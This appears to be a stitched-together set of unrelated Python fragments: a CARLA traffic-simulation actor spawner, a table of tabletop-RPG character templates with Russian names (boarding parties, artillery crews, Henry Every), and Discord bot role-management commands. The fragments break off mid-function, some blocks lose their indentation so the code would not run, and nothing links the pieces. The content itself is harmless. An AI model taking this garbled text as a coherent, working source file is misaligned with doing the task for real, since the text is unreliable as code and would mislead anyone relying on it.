    crowd-service proxy, and spawnable blueprint pools."""

    def __init__(self, args):
        self.args = args
        self.rng = random.Random(args.seed)
        # Simulation bounds: the .sim_bounds file holds "x,y" on line 1 (min
        # corner) and line 2 (max corner). DATA_PATH is defined elsewhere in
        # this module -- presumably a pathlib.Path; confirm at module top.
        with (DATA_PATH/'{}.sim_bounds'.format(args.dataset)).open('r') as f:
            self.bounds_min = carla.Vector2D(*[float(v) for v in f.readline().split(',')])
            self.bounds_max = carla.Vector2D(*[float(v) for v in f.readline().split(',')])
        self.bounds_occupancy = carla.OccupancyMap(self.bounds_min, self.bounds_max)
        # Optional forbidden (no-spawn) region; left unset here.
        self.forbidden_bounds_min = None
        self.forbidden_bounds_max = None
        self.forbidden_bounds_occupancy = None
        # SUMO road network, its segment map, and the segments inside the
        # simulation bounds used for spawning vehicles.
        self.sumo_network = carla.SumoNetwork.load(str(DATA_PATH/'{}.net.xml'.format(args.dataset)))
        self.sumo_network_segments = self.sumo_network.create_segment_map()
        self.sumo_network_spawn_segments = self.sumo_network_segments.intersection(carla.OccupancyMap(self.bounds_min, self.bounds_max))
        self.sumo_network_spawn_segments.seed_rand(self.rng.getrandbits(32))
        self.sumo_network_occupancy = carla.OccupancyMap.load(str(DATA_PATH/'{}.network.wkt'.format(args.dataset)))
        # Sidewalk derived from the road-network occupancy with a 1.5 m offset.
        self.sidewalk = self.sumo_network_occupancy.create_sidewalk(1.5)
        self.sidewalk_segments = self.sidewalk.create_segment_map()
        self.sidewalk_spawn_segments = self.sidewalk_segments.intersection(carla.OccupancyMap(self.bounds_min, self.bounds_max))
        self.sidewalk_spawn_segments.seed_rand(self.rng.getrandbits(32))
        self.sidewalk_occupancy = carla.OccupancyMap.load(str(DATA_PATH/'{}.sidewalk.wkt'.format(args.dataset)))
        # CARLA server connection and the Pyro4 crowd-service RPC proxy.
        self.client = carla.Client(args.host, args.port)
        self.client.set_timeout(10.0)
        self.world = self.client.get_world()
        self.crowd_service = Pyro4.Proxy('PYRO:crowdservice.warehouse@localhost:{}'.format(args.pyroport))
        # Blueprint pools: pedestrians, all vehicles, 4-wheelers (cars) and
        # 2-wheelers (bikes).
        self.pedestrian_blueprints = self.world.get_blueprint_library().filter('walker.pedestrian.*')
        self.vehicle_blueprints = self.world.get_blueprint_library().filter('vehicle.*')
        self.car_blueprints = [x for x in self.vehicle_blueprints if int(x.get_attribute('number_of_wheels')) == 4]
        self.car_blueprints = [x for x in self.car_blueprints if x.id not in ['vehicle.bmw.isetta', 'vehicle.tesla.cybertruck']] # This dude moves too slow.
        self.bike_blueprints = [x for x in self.vehicle_blueprints if int(x.get_attribute('number_of_wheels')) == 2]
class Statistics(object):
    """Aggregated crowd statistics, periodically appended to a log file."""

    def __init__(self, log_file):
        # Caller is expected to set start_time before the first write().
        self.start_time = None
        self.total_num_cars = 0
        self.total_num_bikes = 0
        self.total_num_pedestrians = 0
        self.stuck_num_cars = 0
        self.stuck_num_bikes = 0
        self.stuck_num_pedestrians = 0
        self.avg_speed_cars = 0
        self.avg_speed_bikes = 0
        self.avg_speed_pedestrians = 0
        self.log_file = log_file

    def write(self):
        """Append one space-separated stats row and force it to disk."""
        self.log_file.write('{} {} {} {} {} {} {} {} {} {}\n'.format(
            time.time() - self.start_time,
            self.total_num_cars,
            self.total_num_bikes,
            self.total_num_pedestrians,
            self.stuck_num_cars,
            self.stuck_num_bikes,
            self.stuck_num_pedestrians,
            self.avg_speed_cars,
            self.avg_speed_bikes,
            self.avg_speed_pedestrians))
        self.log_file.flush()
        # os.fsync takes a file descriptor; flush() above pushed Python-level
        # buffers first, fsync then forces the OS buffers to disk.
        os.fsync(self.log_file.fileno())
''' ========== MAIN LOGIC FUNCTIONS ========== '''
def _inflated_aabb_occupancy(actor, clearance):
    """Occupancy of an actor's AABB grown by `clearance` meters on every side."""
    aabb = get_aabb(actor)
    return carla.OccupancyMap(
        carla.Vector2D(aabb.bounds_min.x - clearance, aabb.bounds_min.y - clearance),
        carla.Vector2D(aabb.bounds_max.x + clearance, aabb.bounds_max.y + clearance))

def _occupied_area(c, clearance):
    """Union of all vehicle/walker AABBs (inflated by `clearance`) plus the
    forbidden-bounds region, used to keep spawns clear of existing actors."""
    occupancy = carla.OccupancyMap() if c.forbidden_bounds_occupancy is None else c.forbidden_bounds_occupancy
    for actor in c.world.get_actors():
        if isinstance(actor, (carla.Vehicle, carla.Walker)):
            occupancy = occupancy.union(_inflated_aabb_occupancy(actor, clearance))
    return occupancy

def do_spawn(c):
    """Spawn new cars/bikes/pedestrians if the crowd service requested them.

    For each requested agent type, makes up to SPAWN_DESTROY_REPETITIONS
    attempts to place an actor on a spawn segment cleared of existing actors
    (each inflated by the per-type clearance), then registers the new actor
    and its path with the crowd service.
    """
    c.crowd_service.acquire_new_cars()
    spawn_car = c.crowd_service.spawn_car
    c.crowd_service.release_new_cars()
    c.crowd_service.acquire_new_bikes()
    spawn_bike = c.crowd_service.spawn_bike
    c.crowd_service.release_new_bikes()
    c.crowd_service.acquire_new_pedestrians()
    spawn_pedestrian = c.crowd_service.spawn_pedestrian
    c.crowd_service.release_new_pedestrians()
    if not spawn_car and not spawn_bike and not spawn_pedestrian:
        return
    # Find car spawn point.
    if spawn_car:
        aabb_occupancy = _occupied_area(c, c.args.clearance_car)
        for _ in range(SPAWN_DESTROY_REPETITIONS):
            spawn_segments = c.sumo_network_spawn_segments.difference(aabb_occupancy)
            if spawn_segments.is_empty:
                continue
            spawn_segments.seed_rand(c.rng.getrandbits(32))
            path = SumoNetworkAgentPath.rand_path(c.sumo_network, PATH_MIN_POINTS, PATH_INTERVAL, spawn_segments, rng=c.rng)
            position = path.get_position(c.sumo_network, 0)
            trans = carla.Transform()
            trans.location.x = position.x
            trans.location.y = position.y
            trans.location.z = 0.2
            trans.rotation.yaw = path.get_yaw(c.sumo_network, 0)
            actor = c.world.try_spawn_actor(c.rng.choice(c.car_blueprints), trans)
            if actor:
                actor.set_collision_enabled(c.args.collision)
                c.world.wait_for_tick(1.0)  # For actor to update pos and bounds, and for collision to apply.
                c.crowd_service.acquire_new_cars()
                c.crowd_service.append_new_cars((
                    actor.id,
                    [p for p in path.route_points],  # Convert to python list.
                    get_steer_angle_range(actor)))
                c.crowd_service.release_new_cars()
                aabb_occupancy = aabb_occupancy.union(_inflated_aabb_occupancy(actor, c.args.clearance_car))
    # Find bike spawn point.
    if spawn_bike:
        aabb_occupancy = _occupied_area(c, c.args.clearance_bike)
        for _ in range(SPAWN_DESTROY_REPETITIONS):
            spawn_segments = c.sumo_network_spawn_segments.difference(aabb_occupancy)
            if spawn_segments.is_empty:
                continue
            spawn_segments.seed_rand(c.rng.getrandbits(32))
            path = SumoNetworkAgentPath.rand_path(c.sumo_network, PATH_MIN_POINTS, PATH_INTERVAL, spawn_segments, rng=c.rng)
            position = path.get_position(c.sumo_network, 0)
            trans = carla.Transform()
            trans.location.x = position.x
            trans.location.y = position.y
            trans.location.z = 0.2
            trans.rotation.yaw = path.get_yaw(c.sumo_network, 0)
            actor = c.world.try_spawn_actor(c.rng.choice(c.bike_blueprints), trans)
            if actor:
                actor.set_collision_enabled(c.args.collision)
                c.world.wait_for_tick(1.0)  # For actor to update pos and bounds, and for collision to apply.
                c.crowd_service.acquire_new_bikes()
                c.crowd_service.append_new_bikes((
                    actor.id,
                    [p for p in path.route_points],  # Convert to python list.
                    get_steer_angle_range(actor)))
                c.crowd_service.release_new_bikes()
                aabb_occupancy = aabb_occupancy.union(_inflated_aabb_occupancy(actor, c.args.clearance_bike))
    # Find pedestrian spawn point.
    if spawn_pedestrian:
        aabb_occupancy = _occupied_area(c, c.args.clearance_pedestrian)
        for _ in range(SPAWN_DESTROY_REPETITIONS):
            spawn_segments = c.sidewalk_spawn_segments.difference(aabb_occupancy)
            if spawn_segments.is_empty:
                continue
            spawn_segments.seed_rand(c.rng.getrandbits(32))
            # BUGFIX: sample from the occupancy-filtered (and freshly seeded)
            # spawn_segments; previously the full c.sidewalk_spawn_segments was
            # used, ignoring the clearance filtering computed above.
            path = SidewalkAgentPath.rand_path(c.sidewalk, PATH_MIN_POINTS, PATH_INTERVAL, c.args.cross_probability, spawn_segments, c.rng)
            position = path.get_position(c.sidewalk, 0)
            trans = carla.Transform()
            trans.location.x = position.x
            trans.location.y = position.y
            trans.location.z = 0.5
            trans.rotation.yaw = path.get_yaw(c.sidewalk, 0)
            actor = c.world.try_spawn_actor(c.rng.choice(c.pedestrian_blueprints), trans)
            if actor:
                actor.set_collision_enabled(c.args.collision)
                c.world.wait_for_tick(1.0)  # For actor to update pos and bounds, and for collision to apply.
                c.crowd_service.acquire_new_pedestrians()
                c.crowd_service.append_new_pedestrians((
                    actor.id,
                    [p for p in path.route_points],  # Convert to python list.
                    path.route_orientations))
                c.crowd_service.release_new_pedestrians()
                aabb_occupancy = aabb_occupancy.union(_inflated_aabb_occupancy(actor, c.args.clearance_pedestrian))
def do_destroy(c):
    """Destroy all actors queued on the crowd service's destroy list."""
    c.crowd_service.acquire_destroy_list()
    pending = c.crowd_service.destroy_list
    c.crowd_service.destroy_list = []
    c.crowd_service.release_destroy_list()
    # Batch the destroy commands so they apply in a single synchronous call.
    c.client.apply_batch_sync([carla.command.DestroyActor(actor_id) for actor_id in pending])
    c.world.wait_for_tick(1.0)
def pull_new_agents(c, car_agents, bike_agents, pedestrian_agents, statistics):
new_car_agents = []
new_bike_agents = []
| |
Heroism':1,
'Potion of Antidote':1,
'Infusion of Claws':1,
'Infusion of Vitality':1,
'Rune of Shielding':1,
'Rune of Armor':1,
'Hand Grenade':10,
'Smoke Grenade':2,
},
}
#----
# Allies (army) (<NAME>):
# (Data) Boarding-party templates keyed by display name; the Russian text in
# the keys is user-facing and must stay as-is.
metadict_chars['Warrior 2 lvl (абордажник-ветеран)'] = {
'base_unit':'Warrior 2 lvl (grenadier line-infantry-veteran)',
'char_class':'Warrior-heavy',
'equipment_weapon':{
'Potion of Heroism':1,
'Potion of Antidote':1,
'Breastplate, 17 century':1,
'Halberd':1,
'Sabre':1,
'Shield':1,
'Pistol, Lorenzony':1,
'Muskete Bullet':30,
'Hand Grenade':5,
'Smoke Grenade':1,
#'Hand Mortar':1,
#'2lb Bomb':3,
},
}
metadict_chars['Warrior 5 lvl (абордажник-лейтенант) (лидер)'] = {
'base_unit':'Warrior 5 lvl (grenadier line-infantry-lieutenant)',
'char_class':'Warrior-officer',
'equipment_weapon':{
'Potion of Heroism':1,
'Potion of Antidote':1,
'Infusion of Vitality':1,
'Rune of Absorbtion':1,
'Rune of Shielding':1,
'Breastplate, 17 century':1,
'Halberd':1,
'Sabre +1':1,
'Shield':1,
'Pistol, Lorenzony':1,
'Muskete Bullet':30,
'Hand Grenade':5,
'Smoke Grenade':1,
#'Hand Mortar':1,
#'2lb Bomb':3,
},
}
metadict_chars['Warrior 4 lvl (абордажник Эвери)'] = {
'base_unit':'Warrior 4 lvl (grenadier line-infantry-sergeant)',
'char_class':'Warrior-heavy',
'behavior':'elite_warrior',
'class_features':{
'Feat_Martial_Adept':True,
'Menacing_Attack':True,
'Precision_Attack':True,
#'Parry':True,
},
'equipment_weapon':{
#'Potion of Rage':1,
'Potion of Heroism':1,
'Potion of Antidote':1,
'Infusion of Vitality':1,
'Rune of Absorbtion':1,
'Breastplate, 17 century':1,
'Halberd':1,
'Sabre':1,
'Shield':1,
'Pistol, Lorenzony':1,
'Muskete Bullet':30,
'Hand Grenade':10,
'Smoke Grenade':1,
#'Hand Mortar':1,
#'2lb Bomb':3,
},
}
metadict_chars['Warrior 5 lvl (лейтенант Эвери)'] = {
'base_unit':'Warrior 5 lvl (grenadier line-infantry-lieutenant)',
'char_class':'Warrior-officer',
'class_features':{
'Feat_Martial_Adept':True,
'Menacing_Attack':True,
'Precision_Attack':True,
#'Parry':True,
'Extra_Attack':True,
},
'equipment_weapon':{
#'Potion of Rage':1,
'Potion of Heroism':1,
'Potion of Antidote':1,
'Infusion of Vitality':1,
'Rune of Absorbtion':1,
'Breastplate, 17 century':1,
'Halberd':1,
'Sabre +1':1,
'Shield':1,
'Pistol, Lorenzony':1,
'Muskete Bullet':30,
'Hand Grenade':10,
'Smoke Grenade':1,
#'Hand Mortar':1,
#'2lb Bomb':3,
},
}
metadict_chars['Warrior 4 lvl (абордажник Эвери) (лидер)'] = {
'base_unit':'Warrior 4 lvl (grenadier line-infantry-sergeant)',
'char_class':'Warrior-heavy',
'behavior':'elite_warrior',
'equipment_weapon':{
#'Potion of Rage':1,
'Potion of Heroism':1,
'Potion of Antidote':1,
'Infusion of Vitality':1,
'Rune of Absorbtion':1,
'Breastplate, 17 century':1,
'Halberd':1,
'Sabre':1,
'Shield':1,
'Pistol, Lorenzony':1,
'Muskete Bullet':30,
'Hand Grenade':10,
'Smoke Grenade':1,
#'Hand Mortar':1,
#'2lb Bomb':3,
},
}
metadict_chars['Warrior 5 lvl (лейтенант Эвери) (лидер)'] = {
'base_unit':'Warrior 5 lvl (grenadier line-infantry-lieutenant)',
'char_class':'Warrior-officer',
'equipment_weapon':{
#'Potion of Rage':1,
'Potion of Heroism':1,
'Potion of Antidote':1,
'Infusion of Vitality':1,
'Rune of Absorbtion':1,
'Breastplate, 17 century':1,
'Halberd':1,
'Sabre +1':1,
'Shield':1,
'Pistol, Lorenzony':1,
'Muskete Bullet':30,
'Hand Grenade':10,
'Smoke Grenade':1,
#'Hand Mortar':1,
#'2lb Bomb':3,
},
}
#----
# Allies (army) (Henry Every):
# (Data) Artillery crew templates; gun variants differ in the mounted cannon
# and its ammunition loadout.
metadict_chars['Warrior 1 lvl (артиллерист)'] = {
'base_unit':'Warrior 1 lvl (cannoneer artillery)',
'behavior':'warrior',
}
metadict_chars['Warrior 2 lvl (артиллерист-ветеран)'] = {
'base_unit':'Warrior 2 lvl (cannoneer artillery-veteran)',
'behavior':'warrior',
}
metadict_chars['Warrior 2 lvl (артиллерист-ветеран) (6lb Cannon)'] = {
'base_unit':'Warrior 2 lvl (cannoneer artillery-veteran)',
'behavior':'elite_warrior',
'equipment_weapon':{
'Rune of Armor':1,
'6lb Cannon, naval':1,
'6lb Bar':100,
'6lb Ball':100,
},
'mount_combat':True,
'mount_type':'6lb Cannon, chassis',
'equipment_mount':{},
}
metadict_chars['Warrior 2 lvl (артиллерист-ветеран) (2lb Falconet)'] = {
'base_unit':'Warrior 2 lvl (cannoneer artillery-veteran)',
'behavior':'elite_warrior',
'equipment_weapon':{
'Rune of Armor':1,
'2lb Falconet':1,
#'2lb Ball':100,
'2lb Bomb':100,
},
'mount_combat':True,
'mount_type':'2lb Cannon, chassis',
'equipment_mount':{},
}
metadict_chars['Warrior 3 lvl (артиллерист-капрал)'] = {
'base_unit':'Warrior 3 lvl (cannoneer artillery-corporal)',
'behavior':'warrior',
}
metadict_chars['Warrior 3 lvl (артиллерист-капрал) (6lb Cannon)'] = {
'base_unit':'Warrior 3 lvl (cannoneer artillery-corporal)',
'behavior':'elite_warrior',
'equipment_weapon':{
'Rune of Armor':1,
'6lb Cannon, naval':1,
'6lb Bar':100,
'6lb Ball':100,
},
'mount_combat':True,
'mount_type':'6lb Cannon, chassis',
'equipment_mount':{},
}
metadict_chars['Warrior 3 lvl (артиллерист-капрал) (12lb Cannon)'] = {
'base_unit':'Warrior 3 lvl (cannoneer artillery-corporal)',
'behavior':'elite_warrior',
'equipment_weapon':{
'Rune of Armor':1,
'12lb Cannon, naval':1,
'12lb Bar':100,
'12lb Ball':100,
},
'mount_combat':True,
'mount_type':'12lb Cannon, chassis',
'equipment_mount':{},
}
metadict_chars['Warrior 4 lvl (артиллерист-сержант)'] = {
'base_unit':'Warrior 4 lvl (cannoneer artillery-sergeant)',
'behavior':'commander',
}
metadict_chars['Warrior 4 lvl (артиллерист-сержант) (12lb Mortar)'] = {
'base_unit':'Warrior 4 lvl (cannoneer artillery-sergeant)',
'behavior':'elite_warrior',
'equipment_weapon':{
'Rune of Armor':1,
'12lb Mortar':1,
'12lb Bomb':100,
},
'mount_combat':True,
'mount_type':'12lb Mortar, chassis',
'equipment_mount':{},
}
metadict_chars['Warrior 4 lvl (артиллерист-сержант) (2lb Falconet)'] = {
'base_unit':'Warrior 4 lvl (cannoneer artillery-sergeant)',
'behavior':'elite_warrior',
'equipment_weapon':{
'Rune of Armor':1,
'2lb Falconet':1,
'2lb Ball':100,
#'2lb Bomb':100,
},
'mount_combat':True,
'mount_type':'2lb Cannon, chassis',
'equipment_mount':{},
}
metadict_chars['Warrior 5 lvl (артиллерист-лейтенант)'] = {
'base_unit':'Warrior 5 lvl (cannoneer artillery-lieutenant)',
}
#----
# Allies (retinue) (Henry Every):
metadict_chars['Fighter 11 lvl (Люсьен де ла Помпаж)'] = {
# Test variant of Every as a martial-arts master. Pain-pain-pain, only a 17% chance against the kensei.
# Fighter 1 lvl (legionary slayer-rookie) sum:100 STR:19 DEX:18 CON:19 INT:15 WIS:12 CHA:17
# Commanding_Presence gives +1d10 to Charisma checks (Intimidation, Performance, Persuasion)
# Tactical_Assessment gives +1d10 to Wisdom (Insight) and Intelligence (History, Investigation) checks
'level':11,
'fearless_AI':True,
'hunter_AI':True,
'sneak_AI':True,
'char_class':'Battlemaster',
'hit_dice':'1d10',
'behavior':'commander',
'hitpoints_medial':True,
'abilityes':{
'strength':19,
'dexterity':18,
'constitution':19,
'intelligence':15,
'wisdom':12,
'charisma':17,
},
'class_features':{
'Feat_Shield_Master':True,
'Feat_Heavy_Armor_Master':True,
'Fighting_Style_Defence':True,
'Second_Wind':True,
'Action_Surge':True,
'Extra_Attack':True,
'Indomitable':True,
'Ability_Score_Improvement':{
'strength':+1,
'constitution':+1,
},
# Battle Master:
'Martial_Archetype_Battlemaster':True,
'Combat_Superiority':True,
'Student_of_War':True,
# Maneuvers (11 lvl -- 7 maneuvers, 5 superiority dice 1d10):
# TODO:
# - Trip_Attack -- knocks prone.
# - Grappling_Strike -- grapple with an attack.
# - Bait_and_Switch -- swap positions and +1d10 AC for self/ally for a turn.
#'Parry':True,
'Menacing_Attack':True,
'Disarming_Attack':True,
'Precision_Attack':True,
'Commanding_Presence':True,
'Tactical_Assessment':True,
#'Bait_and_Switch':True,
},
'race':'Human-hero',
'weapon_skill':['simple','martial'],
'armor_skill':['light','medium','heavy','shield'],
'equipment_supply':soldier_supply,
'equipment_backpack':soldiers_pack,
'equipment_weapon':{
'Potion of Antidote':1,
'Infusion of Heroism':1,
'Rune of Shielding':2,
'Plate Armor +1':1,
'Heavy Shield +1':1,
'Rarity +2':1,
'Rapier +2':1,
'Pistol, Ashbeard':1,
'Muskete Bullet':30,
#'Hand Grenade':10,
'Smoke Grenade':1,
'Poison Blade':40,
},
}
metadict_chars['Fighter 13 lvl (Генри Эвери)'] = {
# Test variant of Every as an eldritch knight. With Mirror_Image and Blur he beats the kensei 60% of the time.
# Fighter 1 lvl (legionary sentinel-battler) sum:103 STR:19 DEX:17 CON:18 INT:16 WIS:16 CHA:17
# Uses Detect_Thoughts to read others' minds.
'level':13,
'fearless_AI':True,
'hunter_AI':True,
'no_grappler_AI':True,
'char_class':'Eldritch_Knight',
'hit_dice':'1d10',
'behavior':'commander',
'hitpoints_medial':True,
'abilityes':{
'strength':19,
'dexterity':17,
'constitution':18,
'intelligence':16,
'wisdom':16,
'charisma':17,
},
'class_features':{
# TODO:
# - Eldritch_Strike -- a hit imposes disadvantage on saving throws vs. spells until the end of the next turn.
'Feat_War_Caster':True,
'Feat_Shield_Master':True,
'Feat_Heavy_Armor_Master':True,
'Feat_Inspiring_Leader':True,
'Ability_Score_Improvement':{
'strength':+1,
'intelligence':+2,
},
'Fighting_Style_Blind_Fighting':True,
'Second_Wind':True,
'Action_Surge':True,
# Eldritch Knight:
'Martial_Archetype_Eldritch_Knight':True,
'Weapon_Bond':True,
'Spellcasting':True,
'Spells':[
# 9 spells at 13 lvl (2 spells outside the evocation and abjuration schools)
('cantrip', 'Message'),
('cantrip', 'Green_Flame_Blade'),
#('cantrip', 'Blade_Ward'),
#('ritual', 'Alarm'),
('1_lvl', 'Shield'),
#('2_lvl', 'Shield'),
#('1_lvl', 'Fog_Cloud'),
('2_lvl', 'Mirror_Image'),
('3_lvl', 'Blur'),
('2_lvl', 'Darkness'),
#('2_lvl', 'Flaming_Sphere'),
#('2_lvl', 'Detect_Thoughts'),
('2_lvl', 'Gust_of_Wind'),
('2_lvl', 'Warding_Wind'),
('3_lvl', 'Counterspell'),
('3_lvl', 'Fireball'),
],
'Extra_Attack':True,
'Indomitable':True,
'War_Magic':True,
'Eldritch_Strike':True,
},
'race':'Human-hero',
'weapon_skill':['simple','martial'],
'armor_skill':['light','medium','heavy','shield'],
'equipment_supply':soldier_supply,
'equipment_backpack':soldiers_pack,
'equipment_weapon':{
# TODO: 3rd-circle runes
#'Infusion of Regeneration':1,
'Rune of Absorbtion':2,
'Plate Armor +1':1,
'Heavy Shield +1':1,
#'Sword of Flame Tongue':1,
#'Sword of Life-Stealing':1,
#'Longsword +2':1,
'Rarity +2':1,
},
}
#----
# Enemy (army) (Gang-i-Sawai, Gunsway):
metadict_chars['Commoner 1 lvl (паломник с Ганг-и-Савайя)'] = {
'base_unit':'Commoner 1 lvl (militia bowman)',
'behavior':'warrior',
'equipment_weapon':{
'Dagger':1,
'Shortbow':1,
'Arrow':40,
},
}
metadict_chars['Commoner 2 lvl (дворянин с Ганг-и-Савайя)'] = {
'base_unit':'Commoner 2 lvl (militia bowman-veteran)',
'behavior':'warrior',
'weapon_skill':['simple','martial'],
'equipment_weapon':{
'Shield':1,
'Scimitar':1,
'Shortbow':1,
'Arrow':40,
},
}
metadict_chars['Warrior 3 lvl (охранник с Ганг-и-Савайя)'] = {
'base_unit':'Warrior 3 lvl (sqythian bowman-corporal)',
'behavior':'elite_warrior',
'equipment_weapon':{
'Rune of Armor':1,
'Shield':1,
'Scimitar':1,
'Longbow':1,
'Arrow':40,
#'Pistol, Lorenzony':1,
#'Muskete Bullet':30,
},
}
metadict_chars['Warrior 4 lvl (охранник-сержант с Ганг-и-Савайя)'] = {
'base_unit':'Warrior 4 lvl (sqythian bowman-sergeant)',
'equipment_weapon':{
'Rune of Armor':1,
'Rune of Shielding':1,
'Shield':1,
'Scimitar':1,
'Longbow':1,
'Arrow':40,
#'Pistol, Lorenzony':1,
#'Muskete Bullet':30,
},
}
metadict_chars['Warrior 5 lvl (охранник-лейтенант с Ганг-и-Савайя)'] = {
'base_unit':'Warrior 5 lvl (sqythian bowman-lieutenant)',
'equipment_weapon':{
'Rune of Armor':1,
'Rune of Shielding':1,
'Rune of Absorbtion':1,
'Shield':1,
'Scimitar +1':1,
'Longbow':1,
'Arrow':40,
#'Pistol, Lorenzony':1,
#'Muskete Bullet':30,
},
}
#----
# Enemy (army) (Aurelis):
metadict_chars['Ranger 5 lvl (лейтенант Аурелиса) (следопыт)'] = {
# Shaitans
'volley_AI':True,
'base_unit':'Ranger 5 lvl (otherworld wanderer-lieutenant)',
'race':'Primevial-medium-hero',
'equipment_weapon':{
'Potion of Heroism':1,
'Potion of Antidote':1,
'Infusion of Regeneration':1,
'Rune of Armor':1,
'Rune of Shielding':1,
'Shield':1,
'Longsword +1':1,
'Longbow, Black Skies':1,
'Seeking Arrow':60,
'Sleep Blade':60,
#'Poison Blade':40,
},
}
metadict_chars['Barbarian 5 lvl (лейтенант Аурелиса) (берсерк)'] = {
'volley_AI':True,
'base_unit':'Barbarian 5 lvl (thracian slayer-lord)',
'race':'Primevial-medium-hero',
'equipment_weapon':{
'Potion of Heroism':1,
'Potion of Antidote':1,
'Infusion of Regeneration':1,
#'Rune of Armor':1,
'Rune of Absorbtion':1,
'Rune of Shielding':1,
'Heavy Shield':1,
'Greatsword +1':1,
'Longbow, Black Skies':1,
'Seeking Arrow':60,
'Sleep Blade':60,
},
}
metadict_chars['Warrior 5 lvl (лейтенант Аурелиса)'] = {
'level':5,
'char_class':'Warrior-bowman',
'hit_dice':'1d8',
'behavior':'elite_warrior',
'class_features':{
'Fighting_Style_Archery':True,
'Feat_Sharpshooter':True,
'Extra_Attack':True,
},
'race':'Primevial-medium',
'weapon_skill':['simple','martial'],
'armor_skill':['light','medium','heavy','shield'],
'equipment_supply':soldier_supply,
'equipment_backpack':soldiers_pack,
'equipment_weapon':{
'Potion of Heroism':1,
'Potion of Antidote':1,
'Infusion of Regeneration':1,
'Rune of Armor':1,
'Rune of Shielding':1,
'Shield':1,
'Longsword +1':1,
'Longbow, Black Skies':1,
'Seeking Arrow':60,
'Sleep Blade':60,
#'Poison Blade':40,
},
}
#----
# Enemy (army) (Salif):
metadict_chars['Warrior 4 lvl (гвардеец Салифа)'] = {
'level':4,
'char_class':'Warrior-pirate',
'hit_dice':'1d8',
'behavior':'elite_warrior',
'class_features':{
'Fighting_Style_Protection':True,
'Feat_Magic_Initiate':True,
'Spellcasting':True,
'Spells':[
('cantrip', 'Mending'),
('cantrip', 'Acid_Splash'),
('ritual', 'Unseen_Servant'),
],
},
'race':'Human-common',
'weapon_skill':['simple','martial'],
'armor_skill':['light','medium','heavy','shield'],
'equipment_supply':soldier_supply,
'equipment_backpack':soldiers_pack,
'equipment_weapon':{
#'Potion of Rage':1,
'Potion of Heroism':1,
'Potion of Antidote':1,
'Rune of Armor':1,
'Rune of Absorbtion':1,
'Heavy Shield':1,
'Sabre':1,
'Longbow':1,
'Poison Arrow':40,
'Poison Blade':10,
#'Flame Grenade':10,
'Smoke Grenade':1,
},
#'mount_combat':False,
#'mount_type':'Riding Horse',
#'equipment_mount':{
# },
}
metadict_chars['Warrior 5 lvl (лейтенант Салифа)'] | |
failed. Bot does not have sufficient permissions to remove {} from {}'.format(
rem_role.mention,
base_role.mention))
except discord.HTTPException:
await self.bot.say('Remove failed, role could not be removed for some reason ¯\_(ツ)_/¯')
@roles.command(pass_context=True)
async def replace(ctx, base_role: discord.Role, rep_role: discord.Role):
    """For every member holding base_role, remove it and grant rep_role.

    Server-only; requires high permissions. `self` is closed over from the
    enclosing cog method.
    """
    if not ctx.message.server:
        await self.bot.say('Sorry, but this command is only accessible from a server')
        return
    in_server = self.bot.get_server(server=ctx.message.server)
    if not self.bot.has_high_permissions(ctx.message.author, in_server):
        return
    try:
        for m in ctx.message.server.members:
            for r in m.roles:
                if r.id == base_role.id:
                    await self.bot.remove_roles(m, base_role)
                    await self.bot.add_roles(m, rep_role)
                    break
        await self.bot.say('Replaced role {} for all members with role {}'.format(rep_role.mention,
                                                                                  base_role.mention))
    except discord.Forbidden:
        await self.bot.say(
            'Remove failed. Bot does not have sufficient permissions to replace {} with {}'.format(
                base_role.mention,
                rep_role.mention))
    except discord.HTTPException:
        # Raw string: the shrug contains '\_', an invalid escape sequence in a
        # normal string literal (same runtime value, no DeprecationWarning).
        await self.bot.say(r'Replace failed, role could not be replaced for some reason ¯\_(ツ)_/¯')
@roles.command(pass_context=True)
async def create(ctx, name: str, color: str = '0xffffff'):
    """Create a mentionable role with the given name and hex color.

    Server-only; requires high permissions. An unparseable color silently
    falls back to white (0xffffff).
    """
    if not ctx.message.server:
        await self.bot.say('Sorry, but this command is only accessible from a server')
        return
    in_server = self.bot.get_server(server=ctx.message.server)
    if not self.bot.has_high_permissions(ctx.message.author, in_server):
        return
    try:
        color = int(color, 16)
    except ValueError:
        # Narrowed from bare `except Exception`: only a malformed hex string
        # can fail here (the parameter is annotated str).
        color = 0xffffff
    try:
        r = await self.bot.create_role(server=ctx.message.server, name=name,
                                       color=discord.Color(color),
                                       mentionable=True)
        await self.bot.say('Created role {}!'.format(r.mention))
    except discord.Forbidden:
        await self.bot.say("I don't have permission to do this.")
    except discord.HTTPException:
        await self.bot.say("Error in creating role :(")
@roles.command(pass_context=True)
async def edit(ctx, name: str, *, options: str):
    """Edit a role by name with `key=value` options (e.g. color=#ff0000).

    Server-only; requires high permissions.
    """
    if not ctx.message.server:
        await self.bot.say('Sorry, but this command is only accessible from a server')
        return
    in_server = self.bot.get_server(server=ctx.message.server)
    if not self.bot.has_high_permissions(ctx.message.author, in_server):
        return
    role = [x for x in ctx.message.server.roles if x.name == name]
    if not role:
        await self.bot.say('Role `{}` does not exist'.format(name))
        return
    options_d = {}
    # BUGFIX: shlex.split's `posix` parameter is a bool (the old code passed
    # the truthy string ' '), and values are split on the FIRST '=' only so
    # values containing '=' are no longer truncated; tokens without '=' are
    # skipped instead of raising IndexError.
    for o in shlex.split(options, comments=False, posix=True):
        key, sep, value = o.partition('=')
        if sep:
            options_d[key.lower()] = value
    if 'color' in options_d:
        options_d['color'] = options_d['color'].replace('#', '0x')
        try:
            color = int(options_d['color'], 16)
        except ValueError:
            color = 0xffffff
        options_d['color'] = discord.Color(color)
    try:
        r = await self.bot.edit_role(server=ctx.message.server, role=role[0], **options_d)
        await self.bot.say('Updated role `{}`'.format(name))
    except discord.Forbidden:
        await self.bot.say('I do not have permissions for this.')
    except Exception:
        await self.bot.say('Error in formatting')
@roles.command(pass_context=True)
@self.bot.test_high_perm
async def timeout(server, ctx):
timeout_role = None
try:
timeout_role = [x for x in ctx.message.server.roles if x.name.lower() == 'timeout'][0]
except Exception:
pass
if timeout_role:
await self.bot.say('There is already a `timeout` role present', delete_after=10)
else:
perm = discord.Permissions.general()
perm.speak = False
perm.send_messages = False
perm.send_tts_messages = False
try:
await self.bot.create_role(ctx.message.server, name='timeout', permissions=perm)
await self.bot.say('Created `timeout` successfully!')
except discord.Forbidden:
await self.bot.say('I do not have sufficient permissions to make this role.', delete_after=10)
except discord.HTTPException:
await self.bot.say('An error occurred while creating role :(', delete_after=10)
        @roles.command(pass_context=True)
        async def help(ctx):
            # DM the invoking user a usage summary for the `roles` command
            # group (sent privately to avoid cluttering the channel).
            await self.bot.send_message(ctx.message.author,
                                        '**Roles usage:**\n'
